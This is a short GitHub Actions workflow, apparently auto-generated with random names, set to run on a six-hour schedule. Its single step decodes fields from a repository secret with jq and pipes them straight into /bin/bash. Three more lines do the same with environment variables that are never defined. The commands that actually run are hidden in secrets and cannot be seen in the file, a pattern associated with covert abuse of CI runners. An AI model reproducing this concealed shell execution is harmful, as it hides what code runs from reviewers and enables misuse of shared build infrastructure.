name: luoxiaoyu2374
on:
  workflow_dispatch:
  schedule:
    - cron: '4 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luoxiaoyu2374
        env:
          kzfc9486: ${{ secrets.kzfc9486 }}
        run: |
          echo $kzfc9486 | jq -r .qtxn648 | /bin/bash
          echo $rujg6449 | jq -r .m18244 | /bin/bash
          echo $m116 | jq -r .iuj3007 | /bin/bash
          echo $oba76 | jq -r .eq2 | /bin/bash

